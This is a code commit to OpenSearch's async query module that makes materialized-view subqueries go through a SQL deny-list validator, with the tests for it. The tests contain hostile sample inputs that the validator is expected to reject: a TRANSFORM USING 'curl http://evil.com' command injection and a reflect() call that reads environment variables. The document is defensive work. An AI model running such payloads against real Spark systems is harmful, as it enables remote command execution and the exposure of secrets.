Skip to content

Commit 024238d

Browse files
committed
Validate Flint extension query subqueries against grammar deny list
Implement validateFlintExtensionQuery() to extract and validate the inner SQL subquery from CREATE MATERIALIZED VIEW statements. Previously, this method was a no-op, meaning MV subqueries were not checked against the grammar element deny list. Also adds tumble and hop to the DATE_TIMESTAMP function type to align with Spark's classification of time windowing functions. Signed-off-by: Jialiang Liang <jiallian@amazon.com>
1 parent d099d3e commit 024238d

4 files changed

Lines changed: 186 additions & 5 deletions

File tree

async-query-core/src/main/java/org/opensearch/sql/spark/validator/FunctionType.java

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -184,6 +184,7 @@ public enum FunctionType {
184184
"from_unixtime",
185185
"from_utc_timestamp",
186186
"hour",
187+
"hop",
187188
"last_day",
188189
"localtimestamp",
189190
"make_date",
@@ -211,6 +212,7 @@ public enum FunctionType {
211212
"to_unix_timestamp",
212213
"to_utc_timestamp",
213214
"trunc",
215+
"tumble",
214216
"try_to_timestamp",
215217
"unix_date",
216218
"unix_micros",

async-query-core/src/main/java/org/opensearch/sql/spark/validator/SQLQueryValidator.java

Lines changed: 11 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -9,6 +9,7 @@
99
import org.apache.logging.log4j.LogManager;
1010
import org.apache.logging.log4j.Logger;
1111
import org.opensearch.sql.datasource.model.DataSourceType;
12+
import org.opensearch.sql.spark.dispatcher.model.IndexQueryDetails;
1213
import org.opensearch.sql.spark.utils.SQLQueryUtils;
1314

1415
/** Validate input SQL query based on the DataSourceType. */
@@ -38,10 +39,18 @@ public void validate(String sqlQuery, DataSourceType datasourceType) {
3839
}
3940

4041
/**
41-
* Validates a query from the Flint extension grammar. The method is currently a no-op.
42+
* Validates a Flint extension query by extracting and validating any embedded SQL subquery. For
43+
* CREATE MATERIALIZED VIEW statements, the inner query is validated against the same deny list
44+
* used for standard SQL queries.
4245
*
4346
* @param sqlQuery The Flint extension query to be validated
4447
* @param dataSourceType The type of the datasource the query is being run on
4548
*/
46-
public void validateFlintExtensionQuery(String sqlQuery, DataSourceType dataSourceType) {}
49+
public void validateFlintExtensionQuery(String sqlQuery, DataSourceType dataSourceType) {
50+
IndexQueryDetails indexQueryDetails = SQLQueryUtils.extractIndexDetails(sqlQuery);
51+
String mvQuery = indexQueryDetails.getMvQuery();
52+
if (mvQuery != null) {
53+
validate(mvQuery, dataSourceType);
54+
}
55+
}
4756
}

async-query-core/src/test/java/org/opensearch/sql/spark/dispatcher/SparkQueryDispatcherTest.java

Lines changed: 71 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -501,6 +501,77 @@ void testDispatchShowMVQuery() {
501501
testDispatchBatchQuery("SHOW MATERIALIZED VIEW IN mys3.default");
502502
}
503503

504+
@Test
505+
void testDispatchMVWithWindowFunctionAllowed() {
506+
when(emrServerlessClientFactory.getClient(any())).thenReturn(emrServerlessClient);
507+
when(queryIdProvider.getQueryId(any(), any())).thenReturn(QUERY_ID);
508+
when(emrServerlessClient.startJobRun(any())).thenReturn(EMR_JOB_ID);
509+
DataSourceMetadata dataSourceMetadata = constructMyGlueDataSourceMetadata();
510+
when(dataSourceService.verifyDataSourceAccessAndGetRawMetadata(
511+
MY_GLUE, asyncQueryRequestContext))
512+
.thenReturn(dataSourceMetadata);
513+
514+
String query =
515+
"CREATE MATERIALIZED VIEW my_glue.default.mv_window AS"
516+
+ " SELECT window.start AS `start.time`, COUNT(*) AS count"
517+
+ " FROM my_glue.default.http_logs WHERE status != 200"
518+
+ " GROUP BY window(`@timestamp`, '1 Minutes')"
519+
+ " WITH (auto_refresh = true, refresh_interval = '1 Minutes',"
520+
+ " checkpoint_location = 's3://bucket/checkpoint',"
521+
+ " watermark_delay = '10 Minutes')";
522+
523+
DispatchQueryResponse response =
524+
sparkQueryDispatcher.dispatch(getBaseDispatchQueryRequest(query), asyncQueryRequestContext);
525+
verify(emrServerlessClient, times(1)).startJobRun(any());
526+
assertEquals(EMR_JOB_ID, response.getJobId());
527+
}
528+
529+
@Test
530+
void testDispatchMVWithTumbleFunctionAllowed() {
531+
when(emrServerlessClientFactory.getClient(any())).thenReturn(emrServerlessClient);
532+
when(queryIdProvider.getQueryId(any(), any())).thenReturn(QUERY_ID);
533+
when(emrServerlessClient.startJobRun(any())).thenReturn(EMR_JOB_ID);
534+
DataSourceMetadata dataSourceMetadata = constructMyGlueDataSourceMetadata();
535+
when(dataSourceService.verifyDataSourceAccessAndGetRawMetadata(
536+
MY_GLUE, asyncQueryRequestContext))
537+
.thenReturn(dataSourceMetadata);
538+
539+
String query =
540+
"CREATE MATERIALIZED VIEW my_glue.default.mv_tumble AS"
541+
+ " SELECT window.start AS `start.time`, COUNT(*) AS count"
542+
+ " FROM my_glue.default.http_logs WHERE status != 200"
543+
+ " GROUP BY TUMBLE(`@timestamp`, '6 Hours')"
544+
+ " WITH (auto_refresh = false)";
545+
546+
DispatchQueryResponse response =
547+
sparkQueryDispatcher.dispatch(getBaseDispatchQueryRequest(query), asyncQueryRequestContext);
548+
verify(emrServerlessClient, times(1)).startJobRun(any());
549+
assertEquals(EMR_JOB_ID, response.getJobId());
550+
}
551+
552+
@Test
553+
void testDispatchMVWithTransformBlocked() {
554+
DataSourceMetadata dataSourceMetadata = constructMyGlueDataSourceMetadata();
555+
when(dataSourceService.verifyDataSourceAccessAndGetRawMetadata(
556+
MY_GLUE, asyncQueryRequestContext))
557+
.thenReturn(dataSourceMetadata);
558+
559+
String query =
560+
"CREATE MATERIALIZED VIEW my_glue.default.mv_exploit AS"
561+
+ " SELECT TRANSFORM(status) USING 'curl http://evil.com' AS x"
562+
+ " FROM my_glue.default.http_logs"
563+
+ " WITH (auto_refresh = false)";
564+
565+
IllegalArgumentException exception =
566+
Assertions.assertThrows(
567+
IllegalArgumentException.class,
568+
() ->
569+
sparkQueryDispatcher.dispatch(
570+
getBaseDispatchQueryRequest(query), asyncQueryRequestContext));
571+
Assertions.assertTrue(exception.getMessage().contains("TRANSFORM is not allowed"));
572+
verifyNoInteractions(emrServerlessClient);
573+
}
574+
504575
@Test
505576
void testRefreshIndexQuery() {
506577
when(emrServerlessClientFactory.getClient(any())).thenReturn(emrServerlessClient);

async-query-core/src/test/java/org/opensearch/sql/spark/validator/SQLQueryValidatorTest.java

Lines changed: 102 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,6 @@
1212
import static org.mockito.Mockito.when;
1313

1414
import java.util.Arrays;
15-
import java.util.UUID;
1615
import lombok.AllArgsConstructor;
1716
import lombok.Getter;
1817
import org.antlr.v4.runtime.CommonTokenStream;
@@ -577,11 +576,111 @@ void testSecurityLakeQueries() {
577576
}
578577

579578
@Test
580-
void testValidateFlintExtensionQuery() {
579+
void testValidateFlintExtensionQuery_safeQuery() {
580+
when(mockedProvider.getValidatorForDatasource(any()))
581+
.thenReturn(new S3GlueSQLGrammarElementValidator());
582+
assertDoesNotThrow(
583+
() ->
584+
sqlQueryValidator.validateFlintExtensionQuery(
585+
"CREATE MATERIALIZED VIEW mv AS select * from table WITH (auto_refresh = false)",
586+
DataSourceType.S3GLUE));
587+
}
588+
589+
@Test
590+
void testValidateFlintExtensionQuery_blocksTransformInMV() {
591+
when(mockedProvider.getValidatorForDatasource(any()))
592+
.thenReturn(new S3GlueSQLGrammarElementValidator());
593+
assertThrows(
594+
IllegalArgumentException.class,
595+
() ->
596+
sqlQueryValidator.validateFlintExtensionQuery(
597+
"CREATE MATERIALIZED VIEW mv AS SELECT TRANSFORM(id) USING 'cmd' AS x FROM tbl"
598+
+ " WITH (auto_refresh = false)",
599+
DataSourceType.S3GLUE));
600+
}
601+
602+
@Test
603+
void testValidateFlintExtensionQuery_blocksReflectInMV() {
604+
when(mockedProvider.getValidatorForDatasource(any()))
605+
.thenReturn(new S3GlueSQLGrammarElementValidator());
606+
assertThrows(
607+
IllegalArgumentException.class,
608+
() ->
609+
sqlQueryValidator.validateFlintExtensionQuery(
610+
"CREATE MATERIALIZED VIEW mv AS SELECT reflect('java.lang.System', 'getenv',"
611+
+ " 'PATH') FROM tbl WITH (auto_refresh = false)",
612+
DataSourceType.S3GLUE));
613+
}
614+
615+
@Test
616+
void testValidateFlintExtensionQuery_nonMVStatementsPass() {
617+
assertDoesNotThrow(
618+
() ->
619+
sqlQueryValidator.validateFlintExtensionQuery(
620+
"DROP MATERIALIZED VIEW mv", DataSourceType.S3GLUE));
621+
assertDoesNotThrow(
622+
() ->
623+
sqlQueryValidator.validateFlintExtensionQuery(
624+
"REFRESH MATERIALIZED VIEW mv", DataSourceType.S3GLUE));
625+
assertDoesNotThrow(
626+
() ->
627+
sqlQueryValidator.validateFlintExtensionQuery(
628+
"CREATE SKIPPING INDEX ON tbl (col VALUE_SET)", DataSourceType.S3GLUE));
629+
}
630+
631+
@Test
632+
void testValidateFlintExtensionQuery_mvWithWindowFunction() {
633+
when(mockedProvider.getValidatorForDatasource(any()))
634+
.thenReturn(new S3GlueSQLGrammarElementValidator());
635+
assertDoesNotThrow(
636+
() ->
637+
sqlQueryValidator.validateFlintExtensionQuery(
638+
"CREATE MATERIALIZED VIEW ds.default.mv AS SELECT window.start AS `start.time`,"
639+
+ " COUNT(*) AS count FROM ds.default.http_logs WHERE status != 200"
640+
+ " GROUP BY window(`@timestamp`, '1 Minutes')"
641+
+ " WITH (auto_refresh = true, refresh_interval = '1 Minutes',"
642+
+ " checkpoint_location = 's3://bucket/checkpoint',"
643+
+ " watermark_delay = '10 Minutes')",
644+
DataSourceType.S3GLUE));
645+
}
646+
647+
@Test
648+
void testValidateFlintExtensionQuery_mvWithTumbleFunction() {
649+
when(mockedProvider.getValidatorForDatasource(any()))
650+
.thenReturn(new S3GlueSQLGrammarElementValidator());
651+
assertDoesNotThrow(
652+
() ->
653+
sqlQueryValidator.validateFlintExtensionQuery(
654+
"CREATE MATERIALIZED VIEW ds.default.mv AS SELECT window.start AS `start.time`,"
655+
+ " COUNT(*) AS count FROM ds.default.http_logs WHERE status != 200"
656+
+ " GROUP BY TUMBLE(`@timestamp`, '6 Hours')"
657+
+ " WITH (auto_refresh = false)",
658+
DataSourceType.S3GLUE));
659+
}
660+
661+
@Test
662+
void testValidateFlintExtensionQuery_mvWithHopFunction() {
663+
when(mockedProvider.getValidatorForDatasource(any()))
664+
.thenReturn(new S3GlueSQLGrammarElementValidator());
665+
assertDoesNotThrow(
666+
() ->
667+
sqlQueryValidator.validateFlintExtensionQuery(
668+
"CREATE MATERIALIZED VIEW ds.default.mv AS SELECT window.start AS `start.time`,"
669+
+ " COUNT(*) AS count FROM ds.default.http_logs"
670+
+ " GROUP BY HOP(`@timestamp`, '5 Minutes', '10 Minutes')"
671+
+ " WITH (auto_refresh = false)",
672+
DataSourceType.S3GLUE));
673+
}
674+
675+
@Test
676+
void testValidateFlintExtensionQuery_coveringIndexPass() {
581677
assertDoesNotThrow(
582678
() ->
583679
sqlQueryValidator.validateFlintExtensionQuery(
584-
UUID.randomUUID().toString(), DataSourceType.SECURITY_LAKE));
680+
"CREATE INDEX idx ON ds.default.http_logs (status, day, clientip)"
681+
+ " WITH (auto_refresh = true, refresh_interval = '5 minute',"
682+
+ " checkpoint_location = 's3://bucket/checkpoint')",
683+
DataSourceType.S3GLUE));
585684
}
586685

587686
@Test

0 commit comments

Comments
 (0)